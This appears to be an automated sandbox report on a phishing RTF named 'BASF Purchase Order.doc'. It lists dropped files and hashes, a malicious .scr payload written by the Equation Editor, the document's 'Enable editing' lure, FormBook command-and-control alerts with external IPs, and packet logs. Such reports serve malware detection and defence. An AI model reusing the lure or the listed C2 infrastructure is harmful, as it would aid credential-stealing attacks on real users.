SSDEEP:	96:kCcuN/mXU+anR+7GgXXgXdMcAM3K4tGvAF+GEhwIEVtvaENwzY0aR:kA/B+7GgXQbKWrF+GEeJvaENwzcR
MD5:	BFB8AF50852D855D023CD0FF0FC2385D
SHA1:	D9F03964B462DA56070E836A1FDFFE729E5C517F
SHA-256:	B8003EA9BF136637F517C7118B5E86659BF1F1D7146871AD0519DAD53A214A67
SHA-512:	0E142B701C1056892D9D12EC809C99AB75CB4BC320C71220FA35CF8463BF5A1D8975DBD961A7FEDD6617C0F8D07FBC9ED732B684471F0556EF4654E601571220
Malicious:	false
Preview:	EXPORTS.sqlite3_aggregate_context.sqlite3_aggregate_count.sqlite3_auto_extension.sqlite3_autovacuum_pages.sqlite3_backup_finish.sqlite3_backup_init.sqlite3_backup_pagecount.sqlite3_backup_remaining.sqlite3_backup_step.sqlite3_bind_blob.sqlite3_bind_blob64.sqlite3_bind_double.sqlite3_bind_int.sqlite3_bind_int64.sqlite3_bind_null.sqlite3_bind_parameter_count.sqlite3_bind_parameter_index.sqlite3_bind_parameter_name.sqlite3_bind_pointer.sqlite3_bind_text.sqlite3_bind_text16.sqlite3_bind_text64.sqlite3_bind_value.sqlite3_bind_zeroblob.sqlite3_bind_zeroblob64.sqlite3_blob_bytes.sqlite3_blob_close.sqlite3_blob_open.sqlite3_blob_read.sqlite3_blob_reopen.sqlite3_blob_write.sqlite3_busy_handler.sqlite3_busy_timeout.sqlite3_cancel_auto_extension.sqlite3changegroup_add.sqlite3changegroup_add_strm.sqlite3changegroup_delete.sqlite3changegroup_new.sqlite3changegroup_output.sqlite3changegroup_output_strm.sqlite3_changes.sqlite3_changes64.sqlite3changeset_apply.sqlite3changeset_apply_strm.sqlite3change

C:\Users\user\AppData\Local\Temp\sqlite3.dll

Download File

Process:	C:\Windows\SysWOW64\dfrgui.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1105974
Entropy (8bit):	6.502004510674556
Encrypted:	false
SSDEEP:	12288:49sUCIdY0iSQX8yVcOFT5l+Z0d2oCKX5Jq0Wh+x/2DJfFH+lqWKzpGS0wKIh:42JIWaw8JOF5ab9aWh+x89mqpx0wKIh
MD5:	F55E5766477DE5997DA50F12C9C74C91
SHA1:	4DC98900A887BE95411F07B9E597C57BDC7DBAB3
SHA-256:	90BE88984EE60864256378C952D44B13D55AC032AB6A7B8C698885176BCECE69
SHA-512:	983417A297E68B58FBD1C07FED7A1697D249110A2C10644B2DC96E3FACEDD3FBFBCAC6A7809631FFD62894F02CADD4D3E62022B9E5E026E5BF434F1EB1878F05
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: APR0927,24.doc, Detection: malicious, Browse Filename: PO-210.xls, Detection: malicious, Browse Filename: 1pnboZHFBw.exe, Detection: malicious, Browse Filename: 6KTgt5cvlI.exe, Detection: malicious, Browse Filename: rMRyXHcqPD.exe, Detection: malicious, Browse Filename: rMRyXHcqPD.exe, Detection: malicious, Browse Filename: 6OYe8LzpcJ.exe, Detection: malicious, Browse Filename: 41-1909.xls, Detection: malicious, Browse Filename: ORDER.xls, Detection: malicious, Browse Filename: Minimal_Stock_Report_11-11-2022-01006.xls, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....(.b...........!....."...................@.....a.........................0.......7........ .....................................0.......................@..(<........................... .......................................................text...T!......."..................`.P`.data...\|'...@...(...(..............@.`..rdata..pD...p...F...P..............@.`@.bss....(.............................`..edata..........,..................@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... .... ......................@.0..rsrc........0......................@.0..reloc..(<...@...>..................@.0B/4......8...........................@.@B/19.....R...........................@..B/31.....]'...`...(..................@..B/45......-..........................@..B/57.....\............>..............@.0B/70.....#............J..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\BASF Purchase Order.LNK

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:05 2023, mtime=Fri Aug 11 15:42:05 2023, atime=Mon Jun 3 05:51:17 2024, length=77080, window=hide
Category:	dropped
Size (bytes):	1059
Entropy (8bit):	4.5179041909178865
Encrypted:	false
SSDEEP:	24:8ol10G/XT871xOyK3zzJNeclzXDv3qdk7N:8+p/XTC1x6rmdiN
MD5:	CEC45616AA3AD9A666E43508714F0F9A
SHA1:	807726B4D50E09C03EE30E3D89EDE2BBABE6A25D
SHA-256:	3A380D4CA0D907FCA41388BD5F8AB6B0D9BDFC8CCA41CA9F90C5BB1048A0F363
SHA-512:	FF8D1D803AA009B80257F83DE4D8A1020481DEFF85E6FF068BCF1074DB72DBCA5A10D5D501B82C0CDB110EE3888AB1AC5A80E6F5B153B71D3D3AD163FF9B4074
Malicious:	false
Preview:	L..................F.... ...R...r...R...r....aOo.....-...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Xg6..user.8......QK.X.Xg6...&=....U...............A.l.b.u.s.....z.1......WD...Desktop.d......QK.X.WD...._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....x.2..-...Xi6 .BASFPU~1.DOC..\.......WC..WC..........................B.A.S.F. .P.u.r.c.h.a.s.e. .O.r.d.e.r...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\367706\Users.user\Desktop\BASF Purchase Order.doc.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.B.A.S.F. .P.u.r.c.h.a.s.e. .O.r.d.e.r...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......367706..........D_....3N.

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Generic INItialization configuration [folders]
Category:	dropped
Size (bytes):	72
Entropy (8bit):	4.659218057926102
Encrypted:	false
SSDEEP:	3:M1/jFaNq8Fom4zFaNq8Fov:Mx5CJgCJy
MD5:	CEF06E97A59601B3F4F48E0A77B0650E
SHA1:	B6228FFC5DFD7143B2F6EC320EF2C08F37DD93E0
SHA-256:	1334A0650C58E58C6B849782CEC71D544657C006CB855F8282EE04A4ED439681
SHA-512:	906AE7B00004560A5E2630BE8233822785F49AD6C8783F25776145A990D7BA1E873EEDBB95DF674BDC1EF180F141E83B1078D5E5937F0DB319D2DC4E32EC7E08
Malicious:	false
Preview:	[doc]..BASF Purchase Order.LNK=0..[folders]..BASF Purchase Order.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.5038355507075254
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyhGlvAhuWhlkf9ln:vdsCkWtl6hnlOl
MD5:	804390E644FA0474477DF3E9CF0D414F
SHA1:	DD3A35414FDE3DA61F605290145BBF4C16C3F3F7
SHA-256:	8B776BAF7BB823DACC0EC849005404DC9485B8B628B47EAF9017DE8CDB8650D3
SHA-512:	35915649801D7E8BCD5F5571DBF9209BB6E2FE370C518529C8FDA60ED9EA1E253FF0C1F1C197ADD2429A8FDB3B9A5A06C7B2EFEA14B613964720AD9CD057FF25
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Unicode text, UTF-16, little-endian text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Preview:	..

C:\Users\user\AppData\Roaming\sharon48399.scr

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	825856
Entropy (8bit):	7.322568694923543
Encrypted:	false
SSDEEP:	24576:g32nESrd+mqHyzIuSa1OcQuus373aEux6wDbbdlofn:U2nEsIs1OcQuus373aEuBbnofn
MD5:	CBFEE83ADF934845EB949B5449FBBF84
SHA1:	9F12B0AE613BB57CD8F72EAB2C8B1BCDB3B8442B
SHA-256:	A6283622F7508644692B1AAB7AA7B1F1E9E9DC56C86710CEC7BCAEC8DB55DA6D
SHA-512:	5276D4EB5DBE373243B1469F5152FE7B1DDB49A54EB481E88087796834BF58B1A39F6774F1D298A24378491161DEF07D5D18F6A7E07C96BCE869E16ABB75F60E
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....b............"...0.................. ........@.. ....................................`....................................O.......J............................................................................ ............... ..H............text...$.... ...................... ..`.rsrc...J...........................@..@.reloc..............................@..B........................H........s...8..........................................................&.(>.....".......".(C....Vs....(D...t............}.....(E.....~4...t....(F...&.(........(.........".s....&.(f...(#...og...oh....#..4....(i....0.......}3....(>.......{3....X.....}2...z.(>.......}5.....}6.....}7.....(>....~9......9...V(&...r...p~9...op...V(&...r+..p~9...op...V(&...r...p~9...op...V(&...r...p~9...op...V(&...r;..p~9...op...V(&...r}..p~9...op...V(&...r...p~9...op...*V(&...r.

C:\Users\user\Desktop\~$SF Purchase Order.doc

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.5038355507075254
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyhGlvAhuWhlkf9ln:vdsCkWtl6hnlOl
MD5:	804390E644FA0474477DF3E9CF0D414F
SHA1:	DD3A35414FDE3DA61F605290145BBF4C16C3F3F7
SHA-256:	8B776BAF7BB823DACC0EC849005404DC9485B8B628B47EAF9017DE8CDB8650D3
SHA-512:	35915649801D7E8BCD5F5571DBF9209BB6E2FE370C518529C8FDA60ED9EA1E253FF0C1F1C197ADD2429A8FDB3B9A5A06C7B2EFEA14B613964720AD9CD057FF25
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

Static File Info

General

File type:	Rich Text Format data, version 1
Entropy (8bit):	3.4585770800442504
TrID:	Rich Text Format (5005/1) 55.56% Rich Text Format (4004/1) 44.44%
File name:	BASF Purchase Order.doc
File size:	77'080 bytes
MD5:	79b8cf99303217fe4f267ba133e54c1e
SHA1:	32b19642fd76fb71c64bf73cd2ff5bb993a6c0a5
SHA256:	3a332f1b11c8801f0197a99e8a6984c0fe2cafa0a68d75d4779b9e9e875d55e8
SHA512:	9e75bdc1ffb067e6d7fcf6be16c6cafc62fabc99d2d777f8a6fda94866a8cd44660b136d2c92f1a6408fc8815eb023bdbe363c3b721e25cb7258995017bb9d56
SSDEEP:	768:owAbZSibMX9gRWjTMd2cLJpRXUx78Fl3lqrfQD:owAlRPd2cLJpprFl3QrE
TLSH:	8A73E06DD34B02698F92533A9B1B1E4942BDBA3EF34552B0346C437533EAC3D91262BD
File Content Preview:	{\rtf1..{\*\l8xPDT32pQ98epYJCERdYT4riYKuLcUUYPF94ixMfK88nzGXPrnoCxQTu4Zm1qAUc3gk}..{\650615925please click Enable editing from the yellow bar above.The independent auditors. opinion says the financial statements are fairly stated in accordance with the ba

File Icon


Icon Hash:	2764a3aaaeb7bdbf

Static RTF Info

Objects

Id	Start	Format ID	Format	Classname	Datasize	Filename	Sourcepath	Temppath	Exploit
0	00003117h								no

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
06/03/24-08:52:09.561024	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49162	80	192.168.2.22	66.96.161.166
06/03/24-08:55:02.764327	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49203	80	192.168.2.22	84.33.215.91
06/03/24-08:55:16.387997	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49207	80	192.168.2.22	172.67.182.131
06/03/24-08:54:26.931968	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49195	80	192.168.2.22	183.111.183.31
06/03/24-08:52:50.269938	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49167	80	192.168.2.22	54.38.220.85
06/03/24-08:53:03.908284	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49171	80	192.168.2.22	194.9.94.86
06/03/24-08:54:49.329012	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49199	80	192.168.2.22	208.91.197.13
06/03/24-08:53:59.127894	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49187	80	192.168.2.22	67.223.117.189
06/03/24-08:54:12.669840	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49191	80	192.168.2.22	89.116.109.159
06/03/24-08:55:29.982644	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49211	80	192.168.2.22	93.127.187.187
06/03/24-08:53:44.963507	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49183	80	192.168.2.22	183.111.183.31
06/03/24-08:53:31.078911	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49179	80	192.168.2.22	198.12.241.35
06/03/24-08:53:17.476158	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49175	80	192.168.2.22	91.195.240.19

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 3, 2024 08:51:22.931652069 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:22.931688070 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:22.931823015 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:22.945561886 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:22.945597887 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:23.559755087 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:23.559892893 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:23.565344095 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:23.565370083 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:23.565651894 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:23.567953110 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:23.656265020 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:23.700495958 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.270545959 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.270618916 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.270626068 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.270643950 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.270693064 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.270693064 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.270700932 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.270925045 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.270930052 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.271049976 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.271099091 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.271159887 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.271279097 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.271383047 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.271387100 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.271487951 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.271555901 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.271589994 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.271898985 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.271929026 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.272068024 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.272099972 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.277738094 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.386343956 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.386466980 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.494426012 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.494488001 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.494523048 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.494523048 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.494535923 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.494592905 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.494673014 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.494733095 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.494738102 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.494796991 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.495122910 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.495179892 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.495242119 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.495565891 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.495578051 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.495661974 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.495666981 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.495698929 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.495959044 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.496081114 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.496095896 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.496196985 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.496201992 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.496244907 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.496326923 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.496377945 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.496819019 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.497033119 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.497039080 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.497056961 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.497092962 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.497092962 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.497231960 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.497287035 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.497333050 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.497380972 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.729988098 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.730179071 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.730192900 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.730261087 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.730268002 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.730307102 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.730320930 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.730384111 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.730431080 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.730490923 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.730586052 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.730632067 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.730690002 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.730782986 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.730830908 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.730875015 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.731020927 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.731105089 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.731120110 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.731161118 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.731332064 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.731538057 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.731585026 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.731631041 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.732182026 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.732239962 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.732754946 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.732809067 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.732855082 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.732892990 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.733093977 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.733145952 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.734061003 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.734117985 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.734162092 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.734211922 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.734627008 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.734740973 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.735008001 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.735106945 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.735594034 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.735651970 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.735841036 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.735902071 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.846771002 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.846901894 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.846930027 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.846987009 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.976878881 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.977091074 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.977103949 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.977166891 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.977552891 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.977673054 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.977689981 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.977763891 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.977763891 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.978499889 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.978568077 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.979288101 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.979357958 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.979696989 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.979762077 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.979794979 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.979876041 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.979919910 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.979975939 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.980619907 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.980684042 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.980751038 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.980813980 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.980884075 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.980999947 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.981512070 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.981590986 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.981627941 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.981673002 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.981769085 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.982393980 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.982450008 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.982544899 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.982567072 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.982661009 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.983319998 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.983382940 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.983944893 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.984009981 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.984095097 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.984154940 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.984225988 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.984304905 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.984877110 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.984968901 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.985013008 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.985094070 CEST	49161	443	192.168.2.22	188.114.97.3
Jun 3, 2024 08:51:24.985147953 CEST	443	49161	188.114.97.3	192.168.2.22
Jun 3, 2024 08:51:24.985199928 CEST	49161	443	192.168.2.22	188.114.97.3
